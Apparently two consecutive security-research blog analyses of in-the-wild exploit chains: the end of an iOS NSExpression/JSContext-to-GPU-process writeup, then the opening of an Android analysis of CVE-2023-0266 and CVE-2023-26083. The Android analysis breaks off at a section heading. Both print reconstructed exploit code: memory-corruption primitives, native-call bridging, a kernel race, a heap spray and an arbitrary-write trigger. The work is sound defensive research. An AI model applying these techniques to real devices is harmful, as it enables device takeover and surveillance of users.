The first script defines a large set of utility types and functions common to many JS engine exploits. For example it defines a Struct type:

const Struct = function() {

  var buffer = new ArrayBuffer(8);

  var byteView = new Uint8Array(buffer);

  var uint32View = new Uint32Array(buffer);

  var float64View = new Float64Array(buffer);

  return {

    pack: function(type, value) {

       var view = type;

       view[0] = value;

       return new Uint8Array(buffer, 0, type.BYTES_PER_ELEMENT)

      },

    unpack: function(type, bytes) {

        if (bytes.length !== type.BYTES_PER_ELEMENT) throw Error("Invalid bytearray");

        var view = type;

        byteView.set(bytes);

        return view[0]

    },

    int8: byteView,

    int32: uint32View,

    float64: float64View

  }

}();

The majority of the code is defining a custom fully-featured Int64 type.

At the end they define two very useful helper functions:

function addrof(obj) {

  addrof_obj_ary[0] = obj;

  var addr = Int64.fromDouble(addrof_float_ary[0]);

  addrof_obj_ary[0] = null;

  return addr

}

function fakeobj(addr) {

  addrof_float_ary[0] = addr.asDouble();

  var fake = addrof_obj_ary[0];

  addrof_obj_ary[0] = null;

  return fake

}

as well as a read64() primitive:

function read64(addr) {

  read64_float_ary[0] = addr.asDouble();

  var tmp = "";

  for (var it = 0; it < 4; it++) {

    tmp = ("000" + read64_str.charCodeAt(it).toString(16)).slice(-4) + tmp

  }

  var ret = new Int64("0x" + tmp);

  return ret

}

Of course, these primitives don't actually work yet - they are the standard primitives which would usually be built from a JS engine vulnerability like a JIT compiler bug, but there's no vulnerability being exploited here. Instead, after this script has been evaluated, the NSExpression uses the [JSContext objectForKeyedSubscript:] method to look up the global objects used by those primitives and directly corrupts the underlying objects (like the arrays used by addrof and fakeobj) such that the primitives work.

This sets the stage for the second of the three scripts to run:

JS 2

JS2 uses the corrupted addrof_* arrays to build a write64 primitive then declares the following dictionary:

var all_function = {

  syscall: 0n,

  mach_task_self: 1n,

  task_get_special_port: 2n,

  mach_port_allocate: 3n,

  sleep: 4n,

  mach_absolute_time: 5n,

  mach_msg: 6n,

  mach_msg2_trap: 7n,

  mach_msg_send: 8n,

  mach_msg_receive: 9n,

  mach_make_memory_entry: 10n,

  mach_port_type: 11n,

  IOMainPort: 12n,

  IOServiceMatching: 13n,

  IOServiceGetMatchingService: 14n,

  IOServiceOpen: 15n,

  IOConnectCallMethod: 16n,

  open: 17n,

  sprintf: 18n,

  printf: 19n

};

These match up perfectly with the first 20 symbols which the NSExpression looked up via dlsym.

For each of those symbols they define a JS wrapper, like for example this one for task_get_special_port:

function task_get_special_port(task, which_port, special_port) {

    return fcall(all_function["task_get_special_port"], task, which_port, special_port)

}

They declare two ArrayBuffers, one named lock and one named func_buffer:

var lock = new Uint8Array(32);

var func_buffer = new BigUint64Array(24);

They use the read64 primitive to store the address of those buffers into two more variables, then set the first byte of the lock buffer to 1:

var lock_addr = read64(addrof(lock).add(16)).noPAC().asDouble();

var func_buffer_addr = read64(addrof(func_buffer).add(16)).noPAC().asDouble();

lock[0] = 1;

They then define the fcall function which the JS wrappers use to call the native symbols:

function

fcall(func_idx,

      x0 = 0x34343434n, x1 = 1n, x2 = 2n, x3 = 3n,

      x4 = 4n, x5 = 5n, x6 = 6n, x7 = 7n,

      varargs = [0x414141410000n,

                 0x515151510000n,

                 0x616161610000n,

                 0x818181810000n])

{

  if (typeof x0 !== "bigint") x0 = BigInt(x0.toString());

  if (typeof x1 !== "bigint") x1 = BigInt(x1.toString());

  if (typeof x2 !== "bigint") x2 = BigInt(x2.toString());

  if (typeof x3 !== "bigint") x3 = BigInt(x3.toString());

  if (typeof x4 !== "bigint") x4 = BigInt(x4.toString());

  if (typeof x5 !== "bigint") x5 = BigInt(x5.toString());

  if (typeof x6 !== "bigint") x6 = BigInt(x6.toString());

  if (typeof x7 !== "bigint") x7 = BigInt(x7.toString());

  let sanitised_varargs =

    varargs.map(

      (x => typeof x !== "bigint" ? BigInt(x.toString()) : x));

  func_buffer[0] = func_idx;

  func_buffer[1] = x0;

  func_buffer[2] = x1;

  func_buffer[3] = x2;

  func_buffer[4] = x3;

  func_buffer[5] = x4;

  func_buffer[6] = x5;

  func_buffer[7] = x6;

  func_buffer[8] = x7;

  sanitised_varargs.forEach(((x, i) => {

    func_buffer[i + 9] = x

  }));

  lock[0] = 0;

  lock[4] = 0;

  while (lock[4] != 1);

  return new Int64("0x" + func_buffer[0].toString(16))

}

This coerces each argument to a BigInt then fills the func_buffer first with the index of the function to call then each argument in turn. It clears two bytes in the lock ArrayBuffer then waits for one of them to become 1 before reading the return value, effectively implementing a spinlock.

JS 2 doesn't call fcall though. We now return back to the NSExpression to analyse what must be the other side of that ArrayBuffer "shared memory" function call primitive.

In the background

Once JS 2 has been evaluated the NSExpression again uses the [JSContext objectForKeyedSubscript:] method to read the lock_addr and func_buffer_addr variables.

It then creates another NSInvocation, but this time instead of using the double invocation trick it sets the target of the NSInvocation to an NSExpression, sets the selector to expressionValueWithObject: and sets the second argument to the context dictionary which contains the variables defined in the NSExpression. They then call performSelectorInBackground:sel(invoke), causing part of the serialized object to be evaluated on a different thread. It's that background code which we'll look at now:

Loopy landscapes

NSExpressions aren't great for building loop primitives. We already saw that the loop to traverse the linked-list of pthreads was just unrolled 100 times. This time around they want to create an infinite loop, which can't just be unrolled! Instead they use the following construct:

Diagram showing a NSNull alloc node with two arguments, both of which point to the same  child node

They build a tree where each sub-level is evaluated twice by having two arguments which both point to the same expression. Right at the bottom of this tree we find the actual loop body. There are 33 of these doubling-nodes meaning the loop body will be evaluated 2^33 times, effectively a while(1) loop.
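A sketch of building such a doubling tree with the public API (nullClassExpr and loopBody are assumed NSExpressions, per the construct above):

// 33 levels, each evaluating its single child twice => the body is
// evaluated 2^33 times, effectively while(1):
NSExpression *node = loopBody;
for (int i = 0; i < 33; i++) {
  node = [NSExpression expressionForFunction:nullClassExpr
                                selectorName:@"alloc"
                                   arguments:@[node, node]];
}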

Let's look at the body of this loop:

[v_OSSpinLockLockInvocationInstance

  setTarget:[v_functions_listener_lock longLongValue] ];

[v_OSSpinLockLockInvocationInstance

  setSelector:[@0x43434343 longLongValue] ];

[v_OSSpinLockLockInvocationInstanceIMP

  setTarget:v_OSSpinLockLockInvocationInstance ];

[v_OSSpinLockLockInvocationInstanceIMP invoke];

v_functions_listener_lock is the address of the backing buffer of the ArrayBuffer containing the "spinlock" which the JS unlocks after writing all the function call parameters into the func_buffer ArrayBuffer. This calls OSSpinLockLock to lock that lock.

The NSExpression reads the function index from the func_buffer ArrayBuffer's backing buffer, then reads 19 argument slots, writing each 64-bit value into the corresponding slot (target, selector, arguments) of an NSInvocation. They then convert the function index into a string and call valueForKey: on the context dictionary which stores all the NSExpression variables to find the variable with the provided numeric string name (recall that they defined a variable called '0' storing a PACIZA'ed pointer to syscall.)

They use the double invocation trick to call the target function then extract the return value from the NSInvocation and write it into the func_buffer:

[v_serializedInvName getReturnValue:[set_msb(v_functions_listener_buffer) longLongValue] ];

Finally, the loop body ends with an arbitrary write to unlock the spinlock, allowing the JS which was spinning to continue and read the function call result from the ArrayBuffer.
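Putting both halves of the protocol together, here's the serving side as a C sketch - the names, types and the fn_table indirection are illustrative (the real thing is built from NSInvocations, as described above):

#include <stdint.h>
#include <libkern/OSAtomic.h>

extern uint64_t (*fn_table[])(uint64_t, uint64_t, uint64_t, uint64_t,
                              uint64_t, uint64_t, uint64_t, uint64_t);
extern volatile uint64_t func_buffer[24]; // backing store shared with JS
extern volatile int32_t  lock_words[2];   // bytes 0-3 and 4-7 of "lock"

void serve_one_call(void) {
  // OSSpinLockLock treats a non-zero word as locked, so this blocks until
  // the JS caller zeroes byte 0 after staging its arguments:
  OSSpinLockLock((volatile OSSpinLock *)&lock_words[0]);
  uint64_t idx = func_buffer[0];
  func_buffer[0] = fn_table[idx](func_buffer[1], func_buffer[2],
                                 func_buffer[3], func_buffer[4],
                                 func_buffer[5], func_buffer[6],
                                 func_buffer[7], func_buffer[8]);
  lock_words[1] = 1; // the JS side spins until this becomes 1
}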

Then back in the main NSExpression thread it evaluates one final piece of JS in the same JSContext:

JS3

Unlike JS1, JS2 and the NSExpression, JS3 is stripped and partially obfuscated, though with some analysis most of the names can be recovered. For example, the script starts by defining a number of constants which in fact come from system headers - the values appear in exactly the same order as they do there:

const z = 16;

const u = 17;

const m = 18;

const x = 19;

const f = 20;

const v = 21;

const b = 22;

const p = 24;

const l = 25;

const w = 26;

const y = 0;

const B = 1;

const I = 2;

const F = 3;

const U = 4;

const k = 2147483648;

const C = 1;

const N = 2;

const S = 4;

const T = 0x200000000n;

const MACH_MSG_TYPE_MOVE_RECEIVE = 16;

const MACH_MSG_TYPE_MOVE_SEND = 17;

const MACH_MSG_TYPE_MOVE_SEND_ONCE = 18;

const MACH_MSG_TYPE_COPY_SEND = 19;

const MACH_MSG_TYPE_MAKE_SEND = 20;

const MACH_MSG_TYPE_MAKE_SEND_ONCE = 21;

const MACH_MSG_TYPE_COPY_RECEIVE = 22;

const MACH_MSG_TYPE_DISPOSE_RECEIVE = 24;

const MACH_MSG_TYPE_DISPOSE_SEND = 25;

const MACH_MSG_TYPE_DISPOSE_SEND_ONCE = 26;

const MACH_MSG_PORT_DESCRIPTOR = 0;

const MACH_MSG_OOL_DESCRIPTOR = 1;

const MACH_MSG_OOL_PORTS_DESCRIPTOR = 2;

const MACH_MSG_OOL_VOLATILE_DESCRIPTOR = 3;

const MACH_MSG_GUARDED_PORT_DESCRIPTOR = 4;

const MACH_MSGH_BITS_COMPLEX = 0x80000000;

const MACH_SEND_MSG = 1;

const MACH_RCV_MSG = 2;

const MACH_RCV_LARGE = 4;

const MACH64_SEND_KOBJECT_CALL = 0x200000000n;

The code begins by using a number of symbols passed in from the outer RCE js to find the HashMap storing the mach ports implementing the WebContent to GPU Process IPC:

//WebKit::GPUProcess::GPUProcess

var WebKit::GPUProcess::GPUProcess =

  new Int64("0x0a1a0a1a0a2a0a2a");

// offset of m_webProcessConnections HashMap in GPUProcess

var offset_of_m_webProcessConnections =

  new Int64("0x0a1a0a1a0a2a0a2b"); // 136

// offset of IPC::Connection m_connection in GPUConnectionToWebProcess

var offset_of_m_connection_in_GPUConnectionToWebProcess =

 new Int64("0x0a1a0a1a0a2a0a2c"); // 48

// offset of m_sendPort

var offset_of_m_sendPort_in_IPC_Connection = new Int64("0x0a1a0a1a0a2a0a2d"); // 280

// find the m_webProcessConnections HashMap:

var m_webProcessConnections =

  read64( WebKit::GPUProcess::GPUProcess.add(

           offset_of_m_webProcessConnections)).noPAC();

They iterate through the entries in that HashMap to collect the mach ports representing each of the GPU Process to WebContent IPC connections:

var entries_cnt = read64(m_webProcessConnections.sub(8)).hi().asInt32();

var GPU_to_WebProcess_send_ports = [];

for (var he = 0; he < entries_cnt; he++) {

  var hash_map_key = read64(m_webProcessConnections.add(he * 16));

  if (hash_map_key.is0() ||

      hash_map_key.equals(const_int64_minus_1))

  {

    continue

  }

 

  var GPUConnectionToWebProcess =

    read64(m_webProcessConnections.add(he * 16 + 8));

  if (GPUConnectionToWebProcess.is0()) {

    continue

  }

  var m_connection =

    read64(

      GPUConnectionToWebProcess.add(

        offset_of_m_connection_in_GPUConnectionToWebProcess));

  var m_sendPort =

    BigInt(read64(

      m_connection.add(

        offset_of_m_sendPort_in_IPC_Connection)).lo().asInt32());

  GPU_to_WebProcess_send_ports.push(m_sendPort)

}

They allocate a new mach port then iterate through each of the GPU Process to WebContent connection ports, sending each one a mach message with a port descriptor containing a send right to the newly allocated port:

for (let WebProcess_send_port of GPU_to_WebProcess_send_ports) {

  for (let _ = 0; _ < d; _++) {

    // memset the message to 0

    for (let e = 0; e < msg.byteLength; e++) {

      msg.setUint8(e, 0)

    }

  // complex message

  hello_msg.header.msgh_bits.set(

    msg, MACH_MSG_TYPE_COPY_SEND | MACH_MSGH_BITS_COMPLEX, 0);

  // send to the web process

  hello_msg.header.msgh_remote_port.set(

    msg, WebProcess_send_port, 0);

  hello_msg.header.msgh_size.set(msg, hello_msg.__size, 0);

  // one descriptor

  hello_msg.body.msgh_descriptor_count.set(

    msg, 1, hello_msg.header.__size);

  // send a right to the comm port:

  hello_msg.communication_port.name.set(

    msg, comm_port_receive_right,

    hello_msg.header.__size + hello_msg.body.__size);

  // give other side a send right

  hello_msg.communication_port.disposition.set(

    msg, MACH_MSG_TYPE_MAKE_SEND,

    hello_msg_buffer.header.__size + hello_msg.body.__size);

  hello_msg.communication_port.type.set(

    msg, MACH_MSG_PORT_DESCRIPTOR,

    hello_msg.header.__size + hello_msg.body.__size);

  msg.setBigUint64(hello_msg.data.offset, BigInt(_), true);

  // send the request

  kr = mach_msg_send(u8array_backing_ptr(msg));

  if (kr != KERN_SUCCESS) {

    continue

  }

}

Note that, apart from having to use ArrayBuffers instead of pointers, this looks almost like it would if it were written in C and executing truly arbitrary native code. But as we've seen, there's a huge amount of complexity hidden behind that simple call to mach_msg_send.
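For reference, here's roughly what the same message construction looks like in C using the standard types from <mach/message.h> - the struct mirrors the JS prototypes; the retry loop and error handling are elided:

#include <mach/mach.h>

typedef struct {
  mach_msg_header_t          header;
  mach_msg_body_t            body;       // holds the descriptor count
  mach_msg_port_descriptor_t comm_port;  // carries the new port right
  uint64_t                   data;
} hello_msg_t;

static kern_return_t send_hello(mach_port_t dest, mach_port_t comm_receive) {
  hello_msg_t msg = {0};
  msg.header.msgh_bits =
      MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0) | MACH_MSGH_BITS_COMPLEX;
  msg.header.msgh_remote_port = dest;  // a GPU-to-WebContent send port
  msg.header.msgh_size = sizeof(msg);
  msg.body.msgh_descriptor_count = 1;
  msg.comm_port.name = comm_receive;   // our receive right, minted as...
  msg.comm_port.disposition = MACH_MSG_TYPE_MAKE_SEND; // ...a send right
  msg.comm_port.type = MACH_MSG_PORT_DESCRIPTOR;
  return mach_msg_send(&msg.header);
}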

The JS then tries to receive a reply to the hello message; if one arrives, it's assumed that they have found the WebContent process which compromised the GPU process and is waiting for the GPU process exploit to succeed.

It's at this point that we reach the final stages of this writeup.

Last Loops

Having established a new communications channel with the native code running in the WebContent process the JS enters an infinite loop waiting to service requests:

function handle_comms_with_compromised_web_process(comm_port) {
  var kr = KERN_SUCCESS;
  let request_msg = alloc_message_from_proto(req_proto);
  while (true) {
    for (let e = 0; e < request_msg.byteLength; e++) {
      request_msg.setUint8(e, 0)
    }
    req_proto.header.msgh_local_port.set(request_msg, comm_port, 0);
    req_proto.msgh_size.set(request_msg, req_proto.__size, 0);
    // get a request
    kr = mach_msg_receive(u8array_backing_ptr(request_msg));
    if (kr != KERN_SUCCESS) {
      return kr
    }
    let msgh_id = req_proto.header.msgh_id.get(request_msg, 0);
    handle_request_from_web_process(msgh_id, request_msg)
  }
}

In the end, this entire journey culminates in the vending of 9 new JS-implemented IPCs (msgh_id values 0 through 8).

IPC 0:

Just sends a reply message containing KERN_SUCCESS.

IPCs 1 - 4:

These interact with the AppleM2ScalerCSCDriver userclient and presumably trigger the kernel bug.

IPC 5:

Wraps io_service_open_extended, taking a service name and connection type.

IPC 6:

This takes an address and a size and creates a VM_PROT_READ | VM_PROT_WRITE mach_memory_entry covering the requested region, which it returns via a port descriptor.
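Presumably the underlying operation looks something like the following C sketch (our reconstruction of the semantics, not code from the exploit):

#include <mach/mach.h>
#include <mach/mach_vm.h>

// create a read/write memory entry covering [base, base + size)
kern_return_t make_rw_entry(mach_vm_address_t base, mach_vm_size_t size,
                            mach_port_t *entry_out) {
  memory_object_size_t entry_size = size;
  return mach_make_memory_entry_64(mach_task_self(),
                                   &entry_size,
                                   base,
                                   VM_PROT_READ | VM_PROT_WRITE,
                                   entry_out,
                                   MACH_PORT_NULL); // no parent entry
}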

IPC 7:

This IPC extracts the requested mach port name and returns it via a MOVE_SEND disposition.

IPC 8:

This simply calls the exit syscall, presumably to cleanly terminate the process. If that fails, it causes a NULL pointer dereference to crash the process:

  case request_id_const_8: {
    syscall(1, 0);
    read64(new Int64("0x00000000"));
    break
  }

Conclusion

This exploit was undoubtedly complex. Often this complexity is interpreted as a sign that the difficulty of finding and exploiting vulnerabilities is increasing. Yet the buffer overflow vulnerability at the core of this exploit was not complex - it was a well-known, simple anti-pattern in a programming language whose security weaknesses have been studied for decades. I imagine that this vulnerability was relatively easy for the attackers to discover.

The vast majority of the complexity lay in the later post-compromise stages - the glue which connected this IPC vulnerability to the next one in the chain. In my opinion, the reason the attackers invested so much time and effort in this part is that it's reusable. It is a high one-time cost which then hugely decreases the marginal cost of gluing the next IPC bug to the next kernel bug.

Even in a world with NX memory, mandatory code signing, pointer authentication and a myriad of other mitigations, creative attackers are still able to build weird machines just as powerful as native code. The age of data-only exploitation is truly here; yet another mitigation to fix one more trick is unlikely to end it. What does make a difference is focusing on the fundamentals: early-stage design and code reviews, broad testing, and code quality. This vulnerability was introduced less than two years ago; as an industry we should, at a minimum, be aiming to ensure that new code is vetted for well-known vulnerability classes like buffer overflows. That is a low bar which is clearly still not being met.

Analyzing a Modern In-the-wild Android Exploit

19 September 2023 at 16:01

By Seth Jenkins, Project Zero

Introduction


In December 2022, Google’s Threat Analysis Group (TAG) discovered an in-the-wild exploit chain targeting Samsung Android devices. TAG’s blog post covers the targeting and the actor behind the campaign. This is a technical analysis of the final stage of one of the exploit chains, specifically CVE-2023-0266 (a 0-day in the ALSA compatibility layer) and CVE-2023-26083 (a 0-day in the Mali GPU driver) as well as the techniques used by the attacker to gain kernel arbitrary read/write access.


Notably, several of the previous stages of the exploit chain used n-day vulnerabilities:

  • CVE-2022-4262, a 0-day vulnerability in Chrome, was exploited in the Samsung browser to achieve RCE.

  • CVE-2022-3038, a Chrome n-day that remained unpatched in the Samsung browser, was used to escape the Samsung browser sandbox. 

  • CVE-2022-22706, a Mali n-day, was used to achieve higher-level userland privileges. While that bug had been patched by Arm in January of 2022, the patch had not been downstreamed into Samsung devices by the time the exploit chain was discovered.

We now pick up the thread after the attacker has achieved execution as system_server.


Bug #1: Compatibility Layers Have Bugs Too (CVE-2023-0266)

The exploit continues with a race condition in the kernel Advanced Linux Sound Architecture (ALSA) driver, CVE-2023-0266. 64-bit Android kernels support 32-bit syscall calling conventions in order to maintain compatibility with 32-bit programs and apps. As part of this compatibility layer, the kernel maintains code to translate 32-bit system calls into a format understandable by the rest of the 64-bit kernel code. In many cases, the code backing this compatibility layer simply wraps the 64-bit system calls with no extra logic, but in some cases important behaviors are re-implemented in the compatibility layer’s code. Such duplication increases the potential for bugs, as the compatibility layer can be forgotten while making consequential changes. 


In 2017, there was a refactoring in the ALSA driver to move the lock acquisition out of snd_ctl_elem_{write|read}() functions and further up the call graph for the SNDRV_CTL_IOCTL_ELEM_{READ|WRITE} ioctls. However, this commit only addressed the 64-bit ioctl code, introducing a race condition into the 32-bit compatibility layer SNDRV_CTL_IOCTL_ELEM_{READ|WRITE}32 ioctls.


The 32-bit and 64-bit ioctls differ until they both call snd_ctl_elem_{write|read}, so when the lock was moved up the 64-bit call chain, it was entirely removed from the 32-bit ioctls. Here’s the code path for SNDRV_CTL_IOCTL_ELEM_WRITE in 64-bit mode on kernel 5.10.107 post-refactor:


snd_ctl_ioctl
  snd_ctl_elem_write_user
    [takes controls_rwsem]
    snd_ctl_elem_write [lock properly held, all good]
    [drops controls_rwsem]



And here is the code path for that same ioctl called in 32-bit mode:


snd_ctl_ioctl_compat
  snd_ctl_elem_write_user_compat
    ctl_elem_write_user
      snd_ctl_elem_write [missing lock, not good]


These missing locks allowed the attacker to race snd_ctl_elem_add and snd_ctl_elem_write_user_compat calls resulting in snd_ctl_elem_write executing with a freed struct snd_kcontrol object. The 32-bit SNDRV_CTL_IOCTL_ELEM_READ ioctl behaved very similarly to the SNDRV_CTL_IOCTL_ELEM_WRITE ioctl, with the same bug leading to a similar primitive.
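The user-space shape of this race is roughly the following (a hedged sketch: it must run as a 32-bit process so that the compat ioctl paths are used, and the element id/setup details are omitted):

#include <sound/asound.h>
#include <sys/ioctl.h>

int ctl_fd; // e.g. open("/dev/snd/controlC0", O_RDWR); setup omitted

// thread A (started with pthread_create): hammers the unlocked 32-bit
// compat write path
void *racer_write(void *arg) {
  struct snd_ctl_elem_value val = {0}; // .id set to the target user element
  for (;;)
    ioctl(ctl_fd, SNDRV_CTL_IOCTL_ELEM_WRITE, &val);
  return NULL;
}

// thread B: concurrently replaces the user control; the replace path
// reaches snd_ctl_elem_add, which frees the old struct snd_kcontrol
// that thread A may still be using
void *racer_replace(void *arg) {
  struct snd_ctl_elem_info info = {0}; // same id, user element parameters
  for (;;)
    ioctl(ctl_fd, SNDRV_CTL_IOCTL_ELEM_REPLACE, &info);
  return NULL;
}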


In March 2021, these missing locks were added to SNDRV_CTL_IOCTL_ELEM_WRITE32 in upstream commit 1fa4445f9adf1, when the locks were moved back from snd_ctl_elem_write_user into snd_ctl_elem_write in what was supposed to be an inconsequential refactor. This change accidentally fixed the SNDRV_CTL_IOCTL_ELEM_WRITE32 half of the bug. However, the commit was never backported or merged into the Android kernel, as its security impact was not identified, and so the bug remained exploitable in-the-wild in December 2022. The SNDRV_CTL_IOCTL_ELEM_READ32 call also remained unpatched until January 2023, when the in-the-wild exploit was discovered.


A New Heap Spray Primitive

Most exploits take advantage of such a classical UAF condition by reclaiming the virtual memory backing the freed object with attacker-controlled data, and this exploit is no exception. Interestingly, the attacker used Mali GPU driver features to perform the reclaim, despite the primary memory corruption bug being agnostic to the GPU used by the device. By creating many REQ_SOFT_JIT_FREE jobs gated behind a BASE_JD_REQ_SOFT_EVENT_WAIT, the attacker can take advantage of the associated kmalloc_array/copy_from_user calls in kbase_jit_free_prepare to build a powerful heap spray - one which is fully attacker controlled, variable in size, temporally indefinite, and controllably freeable. Heap sprays with all of these properties are uncommon but not unheard of. Other heap spray strategies exist, but at least some of them, such as the userfaultfd technique, are mitigated by SELinux policy and sysctl parameters, although others (such as the equivalent technique provided by AppFuse) may still be available. That makes this new technique particularly potent on Android devices, where many of the alternative spray strategies are mitigated.
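The kernel-side pattern being abused has roughly the following shape (a much-simplified sketch of the idea, with illustrative names - not the actual Mali driver code):

#include <linux/slab.h>
#include <linux/uaccess.h>

// sketch: preparing a "JIT free" soft job allocates an attacker-sized
// buffer and fills it with attacker-provided bytes...
static int jit_free_prepare_sketch(struct kbase_jd_atom *katom,
                                   const void __user *user_data, u32 count)
{
  u8 *ids = kmalloc_array(count, sizeof(*ids), GFP_KERNEL); /* attacker-sized */
  if (!ids)
    return -ENOMEM;
  if (copy_from_user(ids, user_data, count)) {              /* attacker-filled */
    kfree(ids);
    return -EFAULT;
  }
  /* ...and the buffer stays alive until the attacker fires the gating
   * soft event, making the spray temporally indefinite and freeable on
   * demand */
  katom->softjob_data = ids;
  return 0;
}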


Bug #2: A Leaky Feature (CVE-2023-26083)

Mali provides a performance tracing facility called "timeline stream", "tlstream" or "tl". This facility was available to unprivileged code, traces all GPU operations across the whole system (including GPU operations by other processes), and uses kernel pointers as object identifiers in the messages sent to userspace. This means that by generating tlstream events referencing objects containing attacker-controlled data, the attackers are able to place 16 bytes of controlled data at a known kernel address. Additionally, the attackers can use this capability to defeat KASLR as these kernel pointers also leak information about the kernel address space back to userland. This issue was reported to ARM as CVE-2023-26083 on January 17th, 2023, and is now fixed by preventing unprivileged access to the tlstream facility.


Combining The Primitives

The heap spray described above is used to reclaim the backing store of the improperly freed struct snd_kcontrol used in snd_ctl_elem_write. The tlstream facility then allows attackers to fill that backing store with pointers to attacker controlled data. Blending these two capabilities allows attackers to forge highly detailed struct snd_kcontrol objects. The snd_ctl_elem_write code (along with the struct snd_kcontrol definition) is shown below:


struct snd_kcontrol {
  struct list_head list;  /* list of controls */
  struct snd_ctl_elem_id id;
  unsigned int count;     /* count of same elements */
  snd_kcontrol_info_t *info;
  snd_kcontrol_get_t *get;
  snd_kcontrol_put_t *put;
  union {
    snd_kcontrol_tlv_rw_t *c;
    const unsigned int *p;
  } tlv;
  unsigned long private_value;
  void *private_data;
  void (*private_free)(struct snd_kcontrol *kcontrol);
  struct snd_kcontrol_volatile vd[]; /* volatile data */
};

...

static int snd_ctl_elem_write(struct snd_card *card, struct snd_ctl_file *file,
                              struct snd_ctl_elem_value *control)
{
  struct snd_kcontrol *kctl;
  struct snd_kcontrol_volatile *vd;
  unsigned int index_offset;
  int result;

  down_write(&card->controls_rwsem);
  kctl = snd_ctl_find_id(card, &control->id);
  if (kctl == NULL) {
    up_write(&card->controls_rwsem);
    return -ENOENT;
  }

  index_offset = snd_ctl_get_ioff(kctl, &control->id);
  vd = &kctl->vd[index_offset];
  if (!(vd->access & SNDRV_CTL_ELEM_ACCESS_WRITE) || kctl->put == NULL ||
      (file && vd->owner && vd->owner != file)) {
    up_write(&card->controls_rwsem);
    return -EPERM;
  }

  snd_ctl_build_ioff(&control->id, kctl, index_offset);
  result = snd_power_ref_and_wait(card);
  /* validate input values */
  ...
  if (!result)
    result = kctl->put(kctl, control);
  ... //Drop the locks and return
}


While there are a couple of different options available in this function to take advantage of an attacker-controlled kctl, the most apparent is the call to kctl->put. Since the attacker has arbitrary control of the kctl->put function pointer, they could have used this call to gain control of the program counter right away. Instead, in this case they chose to store the developer-intended snd_ctl_elem_user_put function pointer in the kctl->put member and use the call to that function to gain arbitrary r/w. snd_ctl_elem_user_put is the default put function for user-created snd_kcontrol structs, and it does the following operations:

struct user_element {
  ...
  char *elem_data;              /* element data */
  unsigned long elem_data_size; /* size of element data in bytes */
  ...
};

static int snd_ctl_elem_user_put(struct snd_kcontrol *kcontrol,
                                 struct snd_ctl_elem_value *ucontrol)
{
  int change;
  struct user_element *ue = kcontrol->private_data;
  unsigned int size = ue->elem_data_size;
  char *dst = ue->elem_data +
      snd_ctl_get_ioff(kcontrol, &ucontrol->id) * size;
  change = memcmp(&ucontrol->value, dst, size) != 0;
  if (change)
    memcpy(dst, &ucontrol->value, size);
  return change;
}


The attacker uses their (attacker-controlled data at known address) primitive provided by the tlstream facility to generate an allocation acting as a user_element struct. The pointer to this struct is later fed into the kctl struct as the private_data field, giving the attacker control over the struct user_element used in this function. The destination for the memcpy call comes directly out of this user_element struct, meaning that the attacker can set the destination to an arbitrary kernel address. Since the ucontrol->value used as the source comes directly from userland by design, this leads directly to an arbitrary write of controlled data to kernel virtual memory.
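Conceptually, once the forged objects are in place, each arbitrary write boils down to an ordinary control write (a sketch of the idea; in reality every attempt also involves re-winning the race and re-spraying, and the forged element id comes from the earlier stages):

#include <string.h>
#include <sound/asound.h>
#include <sys/ioctl.h>

// one conceptual write: the forged kctl's private_data points at a fake
// user_element whose elem_data is the chosen kernel destination, so the
// snd_ctl_elem_user_put() call memcpy()s our bytes there
// (size must be <= sizeof(val.value), i.e. 512 bytes)
void trigger_write(int ctl_fd, const struct snd_ctl_elem_id *forged_id,
                   const void *data, size_t size) {
  struct snd_ctl_elem_value val;
  memset(&val, 0, sizeof(val));
  val.id = *forged_id;            // resolves to the reclaimed/forged kctl
  memcpy(&val.value, data, size); // becomes the memcpy source in the put
  ioctl(ctl_fd, SNDRV_CTL_IOCTL_ELEM_WRITE, &val);
}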

A Recap of the Linux Kernel VFS Subsystem

This write is unreliable, because each use of it relies heavily on races and heap sprays in order to hit. The exploit proceeds by creating a deterministic, highly reliable arbitrary read/write via the use of this original unreliable write. In the Linux kernel virtual filesystem (VFS) architecture, every struct file comes with a struct file_operations member that defines a set of function pointers used for various system calls such as read, write, ioctl, mmap, etc. These functions interpret the struct file’s private_data member in a type-specific way: private_data usually points to one of a variety of different data structures, depending on the specific struct file. Both of these members, private_data and fops, are populated into the struct file upon its allocation/creation, which happens, for example, within syscalls in the open family. The fops table can be registered as part of a miscdevice, which is used for certain files in the /dev filesystem - for example /dev/ashmem, an Android-specific shared memory API:


static const struct file_operations ashmem_fops = {
  .owner = THIS_MODULE,
  .open = ashmem_open,
  .release = ashmem_release,
  .read_iter = ashmem_read_iter,
  .llseek = ashmem_llseek,
  .mmap = ashmem_mmap,
  .unlocked_ioctl = ashmem_ioctl,
#ifdef CONFIG_COMPAT
  .compat_ioctl = compat_ashmem_ioctl,
#endif
};

static struct miscdevice ashmem_misc = {
  .minor = MISC_DYNAMIC_MINOR,
  .name = "ashmem",
  .fops = &ashmem_fops,
};

static int __init ashmem_init(void)
{
  int ret = -ENOMEM;
  ...
  ret = misc_register(&ashmem_misc);
  if (unlikely(ret)) {
    pr_err("failed to register misc device!\n");
    goto out_free2;
  }
  ...
}

Under normal circumstances, the intended flow is that when userland calls open on /dev/ashmem, a struct file is created, and a pointer to the ashmem_fops table is populated into the struct.
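Under the hood, misc device opens do something conceptually like the following (a simplified sketch of misc_open() in drivers/char/misc.c; find_miscdevice is our illustrative stand-in for the real list walk):

#include <linux/fs.h>
#include <linux/miscdevice.h>

// simplified sketch: the fops pointer stored in the (writable)
// miscdevice structure is copied into every new struct file for that
// device
static int misc_open_sketch(struct inode *inode, struct file *file)
{
  struct miscdevice *c = find_miscdevice(iminor(inode)); /* illustrative lookup */
  const struct file_operations *new_fops = fops_get(c->fops);
  /* if ashmem_misc.fops has been overwritten, every fd opened from
   * here on uses the attacker's forged table */
  replace_fops(file, new_fops);
  if (file->f_op->open)
    return file->f_op->open(inode, file);
  return 0;
}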


Stabilizing The Arbitrary Write

